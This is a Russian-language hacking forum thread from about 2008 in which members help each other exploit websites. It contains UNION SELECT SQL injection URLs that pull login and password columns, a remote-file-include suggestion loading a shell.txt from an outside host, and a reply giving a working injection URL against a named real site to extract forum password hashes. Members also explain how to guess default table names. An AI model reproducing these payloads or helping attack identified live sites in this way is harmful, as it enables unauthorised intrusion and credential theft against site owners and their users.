Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. none222

    none222 Guest

    Reputations:
    0
    а может быть это просто кодировка дргуая?! Попробуй открыть ИнтернетЭксплорером и кодировку сменить на "автовыбор" или ещё чё...
     
  2. CaNNabi$

    CaNNabi$ Elder - Старейшина

    Joined:
    21 Jan 2008
    Messages:
    62
    Likes Received:
    110
    Reputations:
    0
    Это логин и хэш) если я не ошибаюсь =)
    Это я не знаю че за шифровка)

    А это
    Хэш MySQL =)
    Вот ТУТ FAQ по хэшам ;)
     
  3. Dr.Z3r0

    Dr.Z3r0 Leaders of the World

    Joined:
    6 Jul 2007
    Messages:
    284
    Likes Received:
    595
    Reputations:
    567
    Это печально... Если мне не изменяет память это хеш пятого мускула
     
    2 people like this.
  4. neon_fx

    neon_fx Elder - Старейшина

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
    вопрос по IIS и Microsoft .NET Framework

    Такой вопрос
    Есть уязвимость, точнее есть ошибка в скрипте
    при воде левых данных выводит
    Invalid path for MapPath 'Skins/Default/Modules\../../../..].ascx'. A virtual path is expected.
    тоесть в конце пути скрипт добавляет расширение ascx
    пробовал добавить %00
    непомогло
    Подскажите плиз что делать
     
  5. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    попробуй param=http://site.com/shell.txt?
     
  6. none222

    none222 Guest

    Reputations:
    0
    попробуй добавить ?
    и плюс попробуй "инклудить" файлы, что звщищены .htaccess
     
  7. neon_fx

    neon_fx Elder - Старейшина

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
  8. neon_fx

    neon_fx Elder - Старейшина

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
    А почему все пользуются для поиска уязвимостей только гуглом
    че больше ни какие другие поисковики не принимают дополнительніх параметров
    Ну к примеру Yahoo
    я поьзуюсь только им
    в нем лучний результат
     
    1 person likes this.
  9. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Яхо по гугловской базе берет, работает (индексирует) сайты, у гугля много фукций чем у яхы, командные запросы больше... Еще есть search.icq.com но они тоже совместно с гуглем...
     
    #1029 KPOT_f!nd, 24 Feb 2008
    Last edited: 24 Feb 2008
  10. ~Taxa~

    ~Taxa~ New Member

    Joined:
    24 Jan 2008
    Messages:
    19
    Likes Received:
    4
    Reputations:
    -1
    Добрый вечер у меня вопрос по мускуль, нашел скуль и подобрал таблицу, немного погодя нашлись и колонки. Но когда делаю запрос
    www.site.ru/index.php?id=-1 union select 1,2,3,login,4,5,password,7 from admin/*

    То запрос то выполняется, а вот в ответе на страницы нечего нету ( ... С чем это может быть связанно? И можно ли это как то исправить?
     
  11. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    Только учусь!
    Нашел скуль вида:
    http://site.com/index.php?loc=tourism&type=article&read_id=-2+union+select+1,2,3,4,5,6/*

    4.1.22-standard-log:site_name@localhost:site_name_db

    Но при попытке подбирать таблицы выплевует:

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

    объясните пожалуйста, натолкните на варианты решения. Хотелось бы самому справиться но не получается. Всем, кто откликнется-СПАСИБО!!!
     
  12. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Значит не той таблицы который вы вставляете в запрос... Пробуйте до тех пор пока не найдете правильную таблицу
     
  13. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    ~Taxa~ таблица может быть пустая.
     
  14. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    samarin - вы просто не правильно подбирали таблицы, вот ваш сайт
    _http://arhar.dn.ua/index.php?loc=tourism&read_id=-12+union+select+1,2,passwd,4,5,6+from+smf_members/*&start=0
     
    1 person likes this.
  15. ~Taxa~

    ~Taxa~ New Member

    Joined:
    24 Jan 2008
    Messages:
    19
    Likes Received:
    4
    Reputations:
    -1
    Piflit я знаю видел что там зареганно 10к усеров, и еще не только таблица admin но также и другие. Мне не верится что все таблицы пустые (
     
    1 person likes this.
  16. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    KPOT_f!nd - Хотелось конечно самому разобраться, но Спасибо! Если не затруднит объясните откуда взяли именно это название таблицы(т.к я подбирал несколько часов и ни на что толковое не наткнулся), а вы за несколько минут...
     
    1 person likes this.
  17. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Скиньте мне свой номер осику в ПМ я вам стукну и все объясню...
     
  18. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    2 ~Taxa~
    если цифры из запроса выводятся то попробуй
    aes_decrypt(aes_encrypt(login,0x71),0x71)
    ну а чтобы Piflit не ругал меня можешь привести к char ;)
     
  19. Серенький

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    smf_members - это стандартное название таблицы с префиксом по-умолчанию у форумов на движке simple machines.

    _http://someshit.net/as3f13asf21/ - стандартные таблицы движков, и поля к ним.
     
  20. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    таблица admin может быть пустая, а реальные админы быть в таблице realXadmin. так иногда делают)
     
Thread Status:
Not open for further replies.